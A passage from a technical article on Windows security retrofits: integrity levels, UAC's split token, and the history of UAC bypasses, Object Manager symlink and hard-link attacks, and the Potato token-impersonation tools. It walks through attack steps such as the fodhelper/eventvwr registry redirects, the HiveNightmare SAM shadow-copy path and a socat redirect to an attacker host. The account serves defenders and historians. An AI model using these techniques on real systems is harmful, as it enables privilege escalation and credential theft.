&lt;p&gt;The no-write-up mask is the one to memorise, because it is the policy almost every label uses. When a Low-IL caller tries to act on a Medium-IL object, the kernel denies any access whose mapped result contains write-class bits, including the standard-rights &lt;code&gt;WRITE_DAC&lt;/code&gt; (bit 18 of the 32-bit ACCESS_MASK [@ms-learn-access-mask]) and &lt;code&gt;WRITE_OWNER&lt;/code&gt; (bit 19), the type-generic &lt;code&gt;DELETE&lt;/code&gt; (bit 16), and the file-specific &lt;code&gt;FILE_WRITE_DATA&lt;/code&gt; (0x2), &lt;code&gt;FILE_APPEND_DATA&lt;/code&gt; (0x4), &lt;code&gt;FILE_WRITE_EA&lt;/code&gt; (0x10), and &lt;code&gt;FILE_WRITE_ATTRIBUTES&lt;/code&gt; (0x100) [@ms-learn-file-access-rights].&lt;/p&gt;
&lt;p&gt;The presence of &lt;code&gt;FILE_APPEND_DATA&lt;/code&gt; in that list matters operationally: a careless reader of the spec might assume that &quot;append&quot; semantics escape the no-write-up rule because they do not modify existing bytes. They do not. MIC denies both write modes, so log-only append handlers cannot be used as a write-up channel into a higher-IL object.&lt;/p&gt;
&lt;p&gt;A second rule completes the model: &lt;em&gt;process integrity inheritance&lt;/em&gt;. When a process is created, the kernel assigns it the &lt;em&gt;minimum&lt;/em&gt; of the user&apos;s integrity level and the file&apos;s integrity level [@ms-learn-mic]. A medium-IL user running a low-IL executable gets a low-IL process. This is the rule that lets Internet Explorer 7 run at Low even when launched from a Medium user session.&lt;/p&gt;
&lt;p&gt;The first MIC consumer was IE7 &lt;em&gt;Protected Mode&lt;/em&gt;, which shipped with Windows Vista RTM (released to manufacturing November 8, 2006) [@wayback-skywing-uninformed-v8a6, @en-wiki-windows-vista]. (IE7 standalone for Windows XP, released October 18, 2006 [@en-wiki-ie7], runs without Protected Mode -- the feature depends on Vista&apos;s MIC kernel layer.) Skywing&apos;s &lt;em&gt;Uninformed&lt;/em&gt; Volume 8 Article 6, &quot;Getting Out of Jail: Escaping Internet Explorer Protected Mode,&quot; is the first public reverse-engineering of the implementation.&lt;/p&gt;
&lt;p&gt;Skywing&apos;s framing remains the most-cited primer on the subject: &quot;With the introduction of Windows Vista, Microsoft has added a new form of mandatory access control to the core operating system. Internally known as &apos;integrity levels&apos;, this new addition to the security manager allows security controls to be placed on a per-process basis. This is different from the traditional model of per-user security controls used in all prior versions of Windows NT&quot; [@wayback-skywing-uninformed-v8a6]. IE7&apos;s Protected Mode pattern -- a Low-IL worker that does the dangerous parsing, paired with a Medium-IL broker that performs the system-changing operations on the worker&apos;s behalf -- became the template Windows would later generalise into AppContainer.&lt;em&gt;User Interface Privilege Isolation&lt;/em&gt; (UIPI) is the window-message gate that uses MIC at the desktop. A Low-IL window cannot send &lt;code&gt;SendMessage&lt;/code&gt; or &lt;code&gt;PostMessage&lt;/code&gt; traffic to a Medium-IL or higher window. UIPI is the reason you cannot click-jack a UAC consent prompt from a normally-running browser process: the consent prompt runs at High IL, the browser runs at Medium [@en-wiki-mic].&lt;/p&gt;
&lt;p&gt;Windows 8 generalised the MIC pattern into &lt;em&gt;AppContainer&lt;/em&gt;. An AppContainer process gets a fresh Low-IL token plus an &lt;em&gt;AppContainer&lt;/em&gt; flag, a Package SID that identifies the app, and a list of capability SIDs the app declared in its manifest. Microsoft Learn states the resulting isolation directly: &quot;Windows ensures that processes running with a low integrity level cannot obtain access to a process which is associated with an app container&quot; [@ms-learn-mic]. The Package SID and capability SID derivations are the subject of the App Identity sibling article in this series; we will not redefine them here [@app-identity-sibling].&lt;/p&gt;
&lt;p&gt;MIC fixed the integrity boundary inside the kernel. But the same year shipped a separate retrofit for a different problem: why was the consumer admin running every clicked-on &lt;code&gt;.exe&lt;/code&gt; with full administrative authority? And why did Microsoft refuse to call its answer a security boundary?&lt;/p&gt;
&lt;h2&gt;8. UAC, the Split-Token, and the Bypass Tradition&lt;/h2&gt;
&lt;p&gt;Vista&apos;s &lt;em&gt;User Account Control&lt;/em&gt; is the most famous Windows security retrofit, and the only one whose own keepers explicitly published a document declaring it not a security boundary [@msrc-servicing-criteria]. The mechanism is precise. The bypass tradition is enormous. The classification is honest.&lt;/p&gt;
&lt;p&gt;The mechanism first. Microsoft&apos;s documentation on how UAC works gives the verbatim recipe [@ms-learn-uac]: &quot;When an administrator logs on, two separate access tokens are created for the user: a standard user access token and an administrator access token. The standard user access token... contains the same user-specific information as the administrator access token, but the administrative Windows privileges and SIDs are removed... is used to display the desktop by executing the process &lt;code&gt;explorer.exe&lt;/code&gt;. &lt;code&gt;Explorer.exe&lt;/code&gt; is the parent process from which all other user-initiated processes inherit their access token. As a result, all apps run as a standard user unless a user provides consent or credentials to approve an app to use a full administrative access token.&quot;&lt;/p&gt;

A Windows mechanism, introduced with Vista (released to manufacturing November 8, 2006 [@en-wiki-windows-vista]), in which an administrative user receives two linked tokens at logon: a *filtered* Medium-IL token without administrative privileges or SIDs, used by `explorer.exe` and every process descended from it, and a *full* High-IL administrative counterpart that the kernel hands out only after the user clicks through a consent prompt or supplies credentials. The two tokens reference each other through the `LinkedToken` field. UAC is a UX-and-default-behaviour mechanism, not an enforced security boundary [@ms-learn-uac, @msrc-servicing-criteria].
&lt;p&gt;The split-token mechanism produces three elevation triggers. First, an executable can declare its required level in its manifest via the &lt;code&gt;requestedExecutionLevel&lt;/code&gt; element (&lt;code&gt;asInvoker&lt;/code&gt;, &lt;code&gt;highestAvailable&lt;/code&gt;, or &lt;code&gt;requireAdministrator&lt;/code&gt;). Second, certain Microsoft-signed binaries appear on an &lt;em&gt;AutoElevate&lt;/em&gt; whitelist that the kernel consults; processes on the whitelist transparently get the full token without prompting. Third, COM components can be marked elevatable via the &lt;em&gt;COM Elevation Moniker&lt;/em&gt;, which lets code instantiate &lt;code&gt;Elevation:Administrator!new:{guid}&lt;/code&gt; (or &lt;code&gt;Elevation:Highest!new:{guid}&lt;/code&gt;) to obtain a High-IL administrator COM caller -- not a SYSTEM caller; the moniker&apos;s supported run levels are &lt;code&gt;Administrator&lt;/code&gt; and &lt;code&gt;Highest&lt;/code&gt; [@ms-learn-com-elevation-moniker]. Method 41 (Oddvar Moe&apos;s &lt;code&gt;ICMLuaUtil&lt;/code&gt; construction) is the canonical worked example.&lt;/p&gt;
&lt;p&gt;The classification next. Microsoft&apos;s &lt;em&gt;Security Servicing Criteria for Windows&lt;/em&gt; defines a security boundary as the logical separation between security domains with different trust levels, and gives the kernel-mode / user-mode separation as the canonical example [@msrc-servicing-criteria]. The criteria document then enumerates which boundaries Microsoft commits to servicing. UAC and admin-to-kernel are not on the enumerated list.&lt;/p&gt;

A security boundary provides a logical separation between the code and data of security domains with different levels of trust... the separation between kernel mode and user mode is a classic [...] security boundary. Microsoft software depends on multiple security boundaries to isolate devices on the network, virtual machines, and applications on a device. -- Microsoft Security Servicing Criteria for Windows [@msrc-servicing-criteria]
&lt;p&gt;The &quot;outside the enumerated list&quot; classification has a concrete consequence: bypasses of UAC are not eligible for the same security-update treatment a kernel-mode-to-user-mode bypass would get. Mitigations are issued per-redirect, when an attacker&apos;s specific path becomes operationally noisy enough to warrant attention. The seventy-plus methods catalogued in UACMe are the empirical consequence.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; &lt;strong&gt;UAC was never a security boundary.&lt;/strong&gt; The seventy-plus methods catalogued in UACMe are not bugs in UAC. They are the formal consequence of UAC&apos;s classification. Once you recognise that UAC is a UX-and-default-behaviour mechanism rather than an enforced boundary, the bypass tradition is legible as a feature being used as designed and the structural arc to Adminless makes sense.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The bypass canon. Walk it generation by generation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method 1 -- Leo Davidson, 2009.&lt;/strong&gt; Davidson&apos;s &lt;em&gt;Windows 7 UAC Whitelist&lt;/em&gt; writeup is the genealogical root of the UAC bypass tradition [@pretentiousname-davidson, @github-hfiref0x-uacme]. He noticed that &lt;code&gt;sysprep.exe&lt;/code&gt; is on the AutoElevate whitelist and that, when launched from &lt;code&gt;C:\Windows\System32\sysprep\&lt;/code&gt;, it loads several DLLs from the working directory. Use the &lt;code&gt;IFileOperation&lt;/code&gt; COM interface (which the elevator treats as AutoApprove, enabling the file copy without prompting) to drop a malicious &lt;code&gt;cryptbase.dll&lt;/code&gt; into &lt;code&gt;%SystemRoot%\System32\sysprep\&lt;/code&gt;. Then trigger &lt;code&gt;sysprep.exe&lt;/code&gt; -- which is on the AutoElevate whitelist -- and the auto-elevated process loads the attacker&apos;s DLL, and the attacker has a High-IL full administrative token.&lt;/p&gt;
&lt;p&gt;Davidson&apos;s writeup quotes himself bluntly: &quot;This works against the RTM (retail) and RC1 versions of Windows 7&quot; [@pretentiousname-davidson]. UACMe Method 1 records the technique with structured metadata: &quot;Author: Leo Davidson / Type: Dll Hijack / Method: IFileOperation / Target(s): \system32\sysprep\sysprep.exe / Component(s): cryptbase.dll / Implementation: ucmStandardAutoElevation / Works from: Windows 7 (7600) / Fixed in: Windows 8.1 (9600)&quot; [@github-hfiref0x-uacme].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method 25 -- Matt Nelson (enigma0x3), August 15, 2016.&lt;/strong&gt; Seven years after Davidson, Nelson published &quot;Fileless UAC Bypass Using &lt;code&gt;eventvwr.exe&lt;/code&gt; and Registry Hijacking&quot; [@enigma0x3-eventvwr-blog]. The bypass replaces the file-system DLL hijack with a registry redirect. Nelson noticed that &lt;code&gt;eventvwr.exe&lt;/code&gt;, an AutoElevated binary, queries &lt;code&gt;HKCU\Software\Classes\mscfile\shell\open\command&lt;/code&gt; &lt;em&gt;before&lt;/em&gt; &lt;code&gt;HKCR\mscfile\shell\open\command&lt;/code&gt; to find the command to run for the &lt;code&gt;mscfile&lt;/code&gt; ProgID. His verbatim observation: &quot;From the output, it appears that &apos;eventvwr.exe&apos;, as a high integrity process, queries both HKCU and HKCR registry hives to start mmc.exe&quot; [@enigma0x3-eventvwr-blog]. HKCU is writable by the standard user; the user writes a malicious command line under that key, runs &lt;code&gt;eventvwr.exe&lt;/code&gt;, and the auto-elevated process happily executes the user-supplied command line. The first &lt;em&gt;fileless&lt;/em&gt; UAC bypass.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method 33 -- winscripting.blog, 2017.&lt;/strong&gt; Same primitive, different target. The &lt;code&gt;fodhelper.exe&lt;/code&gt; binary is on the AutoElevate whitelist and queries &lt;code&gt;HKCU\Software\Classes\ms-settings\shell\open\command&lt;/code&gt; to launch the Settings app. UACMe records the credit precisely: &quot;Author: winscripting.blog / Type: Shell API / Method: Registry key manipulation / Target(s): \system32\fodhelper.exe / Component(s): Attacker defined / Implementation: ucmShellRegModMethod / Works from: Windows 10 TH1 (10240) / Fixed in: unfixed&quot; [@github-hfiref0x-uacme]. &lt;em&gt;Fixed in: unfixed.&lt;/em&gt; This is what &quot;outside the enumerated list&quot; looks like in practice: nine years after Method 1 and a year after Method 25 demonstrated the underlying class, the registry-redirect template was still being applied to fresh AutoElevate targets and shipping unmitigated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method 41 -- Oddvar Moe.&lt;/strong&gt; The COM elevation moniker route. UACMe records: &quot;Author: Oddvar Moe / Type: Elevated COM interface / Method: ICMLuaUtil&quot; [@github-hfiref0x-uacme]. Instantiate the &lt;code&gt;CMSTPLUA&lt;/code&gt; COM object via the elevation moniker from a Medium-IL process, get back its High-IL &lt;code&gt;ICMLuaUtil&lt;/code&gt; interface, and call its &lt;code&gt;ShellExec&lt;/code&gt; method to run an attacker command line at High IL. The seam is the COM moniker registry&apos;s &lt;code&gt;Elevation\Enabled&lt;/code&gt; key, which marks specific CLSIDs as elevation-capable.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method 31 (sdclt), 29, 34, ...&lt;/strong&gt; The pattern repeats. Matt Nelson&apos;s &lt;code&gt;sdclt.exe&lt;/code&gt; variants exploit the backup-restore UI&apos;s registry lookups. Forshaw&apos;s &lt;code&gt;schtasks&lt;/code&gt; variant exploits the scheduled-task COM interface. The UACMe README enumerates the lot with the laconic one-liner &quot;Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor&quot; [@github-hfiref0x-uacme]. Most of the methods reduce to the same primitive: an AutoElevated Microsoft-signed binary performs a lookup that the standard user can redirect, the standard user supplies an attacker-controlled answer, and the auto-elevated binary executes attacker-controlled work.&lt;/p&gt;

flowchart TD
    A[User Medium-IL process] --&amp;gt; B[Write attacker command line into HKCU writable seam: registry key, file system path, scheduled-task XML]
    B --&amp;gt; C[Trigger AutoElevated Microsoft-signed binary: sysprep.exe / eventvwr.exe / fodhelper.exe / sdclt.exe / etc.]
    C --&amp;gt; D[AutoElevate flag honoured by kernel]
    D --&amp;gt; E[Binary launched at High IL with full administrative token]
    E --&amp;gt; F[Binary performs lookup: HKCU registry / DLL search path / scheduled-task definition]
    F --&amp;gt; G[Lookup returns attacker-supplied content]
    G --&amp;gt; H[High-IL process executes attacker work]

Mark Russinovich&apos;s June 2007 *TechNet Magazine* cover story, &quot;Inside Windows Vista User Account Control,&quot; is the canonical practitioner walkthrough of the split-token model and is preserved on the Wayback Machine [@wayback-russinovich-uac-technet]. Russinovich opens by naming the misunderstanding: &quot;User Account Control (UAC) is an often misunderstood feature in Windows Vista... In this article I discuss the problems UAC solves and describe the architecture and implementation of its component technologies.&quot; The framing throughout the article is that UAC&apos;s purpose is to create the *expectation* that consumer software would run as a standard user, and to push the developer community to refactor away from gratuitous administrator requirements. That framing -- UAC as a UX and migration mechanism -- is consistent with the eventual MSRC servicing-criteria position: not a defended boundary, but a behaviour gate.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft&apos;s servicing-criteria position means a UAC bypass that does not also cross a serviced security boundary is not, by policy, eligible for a security update. Mitigations land when the operational footprint of a particular bypass becomes large enough to justify one. Track UAC mitigations by KB number, not by feature description; consult the UACMe README&apos;s &lt;code&gt;Fixed in:&lt;/code&gt; field as the institutional memory [@github-hfiref0x-uacme, @msrc-servicing-criteria].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;UAC bypasses redirect the elevation flow that produces a token. A different attack family takes the result and steals tokens from already-elevated SYSTEM services. Where do those attacks come from, and why are they all the same bug?&lt;/p&gt;
&lt;h2&gt;9. The Object Manager and the Lookup Surface&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;SeAccessCheck&lt;/code&gt; evaluates a security descriptor it has been handed. Who hands it the descriptor?&lt;/p&gt;
&lt;p&gt;The kernel&apos;s &lt;em&gt;Object Manager&lt;/em&gt; does, after walking a name. Every named kernel object lives somewhere in a hierarchical namespace rooted at &lt;code&gt;\&lt;/code&gt;. Devices live under &lt;code&gt;\Device&lt;/code&gt;. Synchronisation primitives live under &lt;code&gt;\BaseNamedObjects&lt;/code&gt;. Pre-resolved DLL names live under &lt;code&gt;\KnownDlls&lt;/code&gt;. Per-session subtrees live under &lt;code&gt;\Sessions&lt;/code&gt;. The DOS device prefix &lt;code&gt;\GLOBAL??&lt;/code&gt; (and its session-local sibling &lt;code&gt;\??&lt;/code&gt;) holds drive-letter symbolic links into the device tree. When a process calls &lt;code&gt;OpenObject&lt;/code&gt;, the Object Manager parses the name, walks the tree, and returns the object whose security descriptor &lt;code&gt;SeAccessCheck&lt;/code&gt; will then evaluate.&lt;/p&gt;
&lt;p&gt;The kernel performs &lt;em&gt;the lookup&lt;/em&gt; before &lt;em&gt;the access check&lt;/em&gt;. This sequencing creates a parallel attack surface that bypasses &lt;code&gt;SeAccessCheck&lt;/code&gt; entirely. If the attacker can influence the name resolution -- redirect a &lt;code&gt;\??\&lt;/code&gt; symbolic link, plant a junction in NTFS that re-targets a directory traversal, hardlink a low-privilege file at a path the kernel will trust because of the parent directory&apos;s descriptor -- then by the time &lt;code&gt;SeAccessCheck&lt;/code&gt; runs, it is being asked about a different object than the original code path intended to open.&lt;/p&gt;
&lt;p&gt;The HiveNightmare lookup path is the canonical worked example. The exploit reads the SAM database not via &lt;code&gt;\Windows\System32\config\SAM&lt;/code&gt; (which has a tight DACL) but via &lt;code&gt;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy*\Windows\System32\config\SAM&lt;/code&gt;. That path resolves through the Object Manager&apos;s &lt;code&gt;\GLOBAL??&lt;/code&gt; symbolic link, into the device tree, into a Volume Shadow Copy mirror of the original volume, into a &lt;em&gt;copy&lt;/em&gt; of &lt;code&gt;SAM&lt;/code&gt; that inherits the live file&apos;s DACL, which (until the August 2021 patch) granted read access to any authenticated local user (BUILTIN\Users); unlike the live file, the shadow copy is not locked open, so the read succeeds [@nvd-cve-2021-36934].&lt;/p&gt;
&lt;p&gt;The lookup-phase attack class is wider than file-system shadow copies. &lt;em&gt;Object Manager symbolic links&lt;/em&gt; and &lt;em&gt;NTFS hard links&lt;/em&gt; both produce the same primitive: the kernel resolves a name through an attacker-influenced redirect and ends up evaluating &lt;code&gt;SeAccessCheck&lt;/code&gt; against a different security descriptor than the calling code intended.&lt;/p&gt;
&lt;p&gt;CVE-2020-0668, the Service Tracing elevation-of-privilege bug Clément Labro disclosed in February 2020, is the textbook symbolic-link case [@itm4n-cve-2020-0668-blog]. The Service Tracing infrastructure under &lt;code&gt;HKLM\SOFTWARE\Microsoft\Tracing&lt;/code&gt; is user-writable, and several SYSTEM services -- &lt;code&gt;IKEEXT&lt;/code&gt;, &lt;code&gt;RasMan&lt;/code&gt;, the Update Session Orchestrator service -- consult those keys to find a tracing log path. When the log file exceeds the configured &lt;code&gt;MaxFileSize&lt;/code&gt;, the service renames it from &lt;code&gt;MODULE.LOG&lt;/code&gt; to &lt;code&gt;MODULE.OLD&lt;/code&gt;, deleting any existing &lt;code&gt;MODULE.OLD&lt;/code&gt; first.&lt;/p&gt;
&lt;p&gt;itm4n&apos;s exploit is exactly the one his blog post names: &quot;All you need to do is set the target directory as a mountpoint to the &lt;code&gt;\RPC Control&lt;/code&gt; object directory and then create two symbolic links: A symbolic link from &lt;code&gt;MODULE.LOG&lt;/code&gt; to a file you own; A symbolic link from &lt;code&gt;MODULE.OLD&lt;/code&gt; to any file on the file system&quot; [@itm4n-cve-2020-0668-blog]. The mountpoint reroutes the kernel&apos;s name resolution into an Object Manager directory the attacker controls; the two symlinks reroute the rename operation; the SYSTEM service ends up performing an arbitrary file move with kernel authority. Forshaw&apos;s &lt;code&gt;googleprojectzero/symboliclink-testing-tools&lt;/code&gt; repository [@github-projectzero-symlink-tools] provides the primitive library the exploit consumes -- &lt;code&gt;CreateSymlink&lt;/code&gt;, &lt;code&gt;CreateMountPoint&lt;/code&gt;, &lt;code&gt;BaitAndSwitch&lt;/code&gt; -- and the repository is, in effect, the institutional library every Object Manager lookup-phase attack of the past decade has linked against.&lt;/p&gt;
&lt;p&gt;The NTFS hard-link case predates the symbolic-link case by half a decade. James Forshaw&apos;s December 2015 Project Zero post, &quot;Between a Rock and a Hard Link,&quot; is the canonical primary source [@projectzero-blog-rockandhardlink]. Forshaw observes that hard links have been a feature of NTFS &quot;since it was originally designed&quot;, and that their relevance to local privilege escalation is exactly the lookup-vs-access-check sequencing this section describes: &quot;Why are hard links useful for local privilege escalation? One type of vulnerability is exploited by a file planting attack, where a privilege service tries to write to a file in a known location&quot; [@projectzero-blog-rockandhardlink].&lt;/p&gt;
&lt;p&gt;The worked example Forshaw walks is CVE-2015-4481, a Mozilla Maintenance Service hard-link primitive: any user can write a status log to &lt;code&gt;C:\ProgramData\Mozilla\logs\maintenanceservice.log&lt;/code&gt;, and during the service&apos;s pre-write &lt;code&gt;BackupOldLogs&lt;/code&gt; rename a brief window opens in which the attacker can replace the about-to-be-written log path with a hard link to an arbitrary system file. The service&apos;s subsequent write -- which it performs with its own SYSTEM authority -- ends up overwriting the system file. The DACL on the source file (the Mozilla log directory) was correct; the DACL on the destination file (the system binary) was correct; the kernel arrived at the destination by resolving a hard-link name the attacker had planted, and &lt;code&gt;SeAccessCheck&lt;/code&gt; saw only the destination DACL, not the planted-link DACL [@projectzero-blog-rockandhardlink]. Microsoft&apos;s MS15-115 mitigation tightened the kernel&apos;s hard-link semantics for sandboxed callers (the kernel&apos;s &lt;code&gt;NtSetInformationFile&lt;/code&gt; now requires &lt;code&gt;FILE_WRITE_ATTRIBUTES&lt;/code&gt; on the target handle when the caller&apos;s token has the sandboxed-token flag, matching what the user-mode &lt;code&gt;CreateHardLink&lt;/code&gt; wrapper had always opened the target with). The fix closes the sandboxed-process branch of the bug class but, as Forshaw notes, does nothing for the Maintenance Service vulnerability itself, which is exploited by a non-sandboxed local user; the structural fix is to write the log to a directory the user cannot create files in, not to enforce a hard-link mask -- a structural fix to the lookup phase, not the access-check phase.&lt;/p&gt;
&lt;p&gt;The two examples generalise the rule. The kernel resolves names &lt;em&gt;before&lt;/em&gt; checking the requesting user&apos;s authority over the destination. The DACL at &lt;code&gt;target.path&lt;/code&gt; and the DACL at &lt;code&gt;attacker.planted.path&lt;/code&gt; after a junction or hard-link redirect can be different; &lt;code&gt;SeAccessCheck&lt;/code&gt; evaluates the descriptor it arrives at, not the descriptor the original caller intended. Capability systems would resolve names through unforgeable handles instead of strings, and the redirect class would not exist by construction [@en-wiki-capability-based-security]. Windows checks the descriptor on every &lt;code&gt;OpenObject&lt;/code&gt; because the name is a forgeable string. The Object Manager namespace is therefore an attack surface whose load-bearing fix is structural rather than per-bug.The Object Manager&apos;s namespace is not documented as policy in the same way &lt;code&gt;SeAccessCheck&lt;/code&gt;&apos;s algorithm is. The de facto modern documentation is empirical: practitioners enumerate the namespace with tools that read kernel structures directly. James Forshaw&apos;s NtObjectManager PowerShell module, part of the Project Zero &lt;code&gt;sandbox-attacksurface-analysis-tools&lt;/code&gt; repository, is the dominant such tool [@github-projectzero-sandbox-attacksurface]. The repository&apos;s banner is exact: &quot;NtObjectManager: A powershell module which uses NtApiDotNet to expose the NT object manager.&quot;&lt;/p&gt;
&lt;p&gt;The James Forshaw / Project Zero corpus is the systematic reference for the Object Manager attack surface. Forshaw&apos;s &quot;Sharing a Logon Session a Little Too Much&quot; (April 2020) names a primitive PrintSpoofer would later consume: when the LSA creates a token for a new logon session, it caches the token for later retrieval. Forshaw&apos;s verbatim explanation: &quot;when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn&apos;t that useful, however there is one case where the session Token is repurposed, network authentication&quot; [@tiraniddo-sharing-logon-session]. The cached token plus a named-pipe path-validation bug becomes a non-DCOM SYSTEM-token primitive that no DACL touches.&lt;/p&gt;
&lt;p&gt;The lookup surface is half the attack story. The other half is the token surface, and the canonical example of the token surface is a six-year, eight-tool lineage.&lt;/p&gt;
&lt;h2&gt;10. The Potato Lineage: Eight Tools, One Bug (2016-2021)&lt;/h2&gt;
&lt;p&gt;January 16, 2016. Stephen Breen of Foxglove Security publishes &quot;Hot Potato.&quot; The disclosure post opens with a sentence the article will earn the right to repeat: &quot;Microsoft is aware of all of these issues and has been for some time (circa 2000). These are unfortunately hard to fix without breaking backward compatibility and have been [used] by attackers for over 15 years&quot; [@foxglove-hot-potato-blog]. Six years and seven tools later, that admission still describes the situation.&lt;/p&gt;
&lt;p&gt;The single underlying primitive. A low-privileged service account holding &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; (which IIS, SQL Server, the Print Spooler, scheduled tasks, Docker, Citrix, and almost every managed-service account hold by default) tricks SYSTEM into authenticating to a TCP, RPC, or named-pipe endpoint the attacker controls. The attacker&apos;s endpoint accepts the authentication, ends up with an impersonation handle to a SYSTEM token, and calls &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; followed by &lt;code&gt;CreateProcessAsUser&lt;/code&gt; to run arbitrary code as SYSTEM. Same primitive, eight tools, six years.&lt;/p&gt;

sequenceDiagram
    participant Attacker as Attacker (service account, SeImpersonate)
    participant Coercer as Coercion primitive (NBNS / DCOM / EFSRPC / Spooler RPC)
    participant SYSTEM as SYSTEM service
    participant Endpoint as Attacker-controlled local endpoint
    Attacker-&amp;gt;&amp;gt;Coercer: Trigger coercion (e.g. EfsRpcOpenFileRaw, BITS CoGetInstanceFromIStorage)
    Coercer-&amp;gt;&amp;gt;SYSTEM: Tell SYSTEM to authenticate
    SYSTEM-&amp;gt;&amp;gt;Endpoint: NTLM authentication to attacker endpoint
    Endpoint-&amp;gt;&amp;gt;Endpoint: Accept NTLM, build impersonation token
    Attacker-&amp;gt;&amp;gt;Attacker: ImpersonateLoggedOnUser(SYSTEM token)
    Attacker-&amp;gt;&amp;gt;Attacker: CreateProcessAsUser(SYSTEM token, &quot;cmd.exe&quot;)
    Note over Attacker: SYSTEM shell
&lt;p&gt;Walk the lineage one paragraph at a time.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hot Potato (Stephen Breen / Foxglove, January 2016)&lt;/strong&gt; [@foxglove-hot-potato-blog]. The original. Hot Potato chains three Windows defaults: NBT-NS (NetBIOS name service) spoofing on the local network, the Web Proxy Auto-Discovery (WPAD) protocol&apos;s automatic proxy lookup, and Windows Update&apos;s HTTP-to-SMB NTLM relay. The exploit poisons NBT-NS so that the SYSTEM-running Windows Update service resolves &lt;code&gt;WPAD&lt;/code&gt; to the attacker&apos;s local listener; the attacker&apos;s listener serves a proxy configuration that proxies SMB through localhost; the Windows Update service authenticates to the attacker&apos;s localhost SMB endpoint as SYSTEM. Foxglove&apos;s verbatim summary: &quot;Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP-&amp;gt;SMB relay) and NBNS spoofing&quot; [@foxglove-hot-potato-blog].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rotten Potato (Stephen Breen and Chris Mallz / Foxglove, September 2016)&lt;/strong&gt; [@foxglove-rotten-potato-blog]. The successor abandons the network-protocol fragility for a DCOM activation trick that James Forshaw had published as Project Zero issue 325. The attacker calls &lt;code&gt;CoGetInstanceFromIStorage&lt;/code&gt; with the BITS CLSID &lt;code&gt;{4991d34b-80a1-4291-83b6-3328366b9097}&lt;/code&gt; and a custom marshalled &lt;code&gt;IStorage&lt;/code&gt; pointer; the COM activation runs on the local DCOM server (which runs as SYSTEM) and authenticates back to a TCP listener the attacker controls.&lt;/p&gt;
&lt;p&gt;The Foxglove blog states the three steps verbatim: &quot;1. Trick the &apos;NT AUTHORITY\SYSTEM&apos; account into authenticating via NTLM to a TCP endpoint we control. 2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the &apos;NT AUTHORITY\SYSTEM&apos; account. 3. Impersonate the token... This can only be done if the attackers current account has the privilege to impersonate security tokens&quot; [@foxglove-rotten-potato-blog]. The same post credits the Project Zero work directly: &quot;this work is derived directly from James Forshaw&apos;s BlackHat talk and Google Project Zero research&quot; [@foxglove-rotten-potato-blog].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Juicy Potato (decoder_it and ohpe, 2018)&lt;/strong&gt; [@github-ohpe-juicy-potato]. A weaponised, configurable Rotten Potato. The repository README is exact about lineage and entry conditions: &quot;RottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges. ... We decided to weaponize RottenPotatoNG: Say hello to Juicy Potato&quot; [@github-ohpe-juicy-potato].&lt;/p&gt;
&lt;p&gt;Juicy Potato adds a CLSID brute-list (so the attacker can cycle through DCOM activations until one works on the target Windows version), a configurable listener port, and a configurable target binary. The repo&apos;s own framing of when it works is the article&apos;s PullQuote-worthy line: &quot;If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM&quot; [@github-ohpe-juicy-potato]. Juicy Potato was killed by a Windows 10 1809 / Server 2019 mitigation that prevented the OXID resolver from being queried on a port other than 135. The mitigation was the first time Microsoft had touched the underlying primitive.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rogue Potato (Antonio Cocomazzi and Andrea Pierini, May 2020)&lt;/strong&gt; [@decoder-rogue-potato-blog]. The bypass for the loopback-OXID mitigation. Decoder&apos;s blog states the engineering problem and the fix in two sentences: &quot;Starting from Windows 10 1809 &amp;amp; Windows Server 2019, its no more possible to query the OXID resolver on a port different than 135&quot; [@decoder-rogue-potato-blog]. Rogue Potato works around the constraint by routing the OXID resolution through an attacker-controlled &lt;em&gt;remote&lt;/em&gt; OXID resolver, typically reached via &lt;code&gt;socat tcp-listen:135,fork TCP:attacker:9999&lt;/code&gt;. The remote resolver returns a string binding pointing back at the attacker&apos;s local listener; the constraint is satisfied (the OXID resolver is on port 135) but the listener it ultimately reaches is the attacker&apos;s. The lineage extends.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PrintSpoofer (Clément Labro / itm4n, May 2020)&lt;/strong&gt; [@github-itm4n-printspoofer, @itm4n-printspoofer-blog]. The same week as Rogue Potato, a different no-DCOM, no-OXID variant lands. PrintSpoofer drops DCOM entirely. It uses the Print Spooler RPC method &lt;code&gt;RpcRemoteFindFirstPrinterChangeNotificationEx&lt;/code&gt; to coerce the spooler (running as SYSTEM) to call back to a named pipe whose path the attacker controls. A path-validation bypass on the named-pipe name lets the attacker capture the SYSTEM credential the spooler offers.&lt;/p&gt;
&lt;p&gt;itm4n&apos;s repository description summarises the entry condition: &quot;From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019&quot; [@github-itm4n-printspoofer]. The blog post opens with credit and the canonical decoder_it quote: &quot;I want to start things off with this quote from @decoder_it: &apos;if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM&apos;&quot; [@itm4n-printspoofer-blog].&lt;/p&gt;
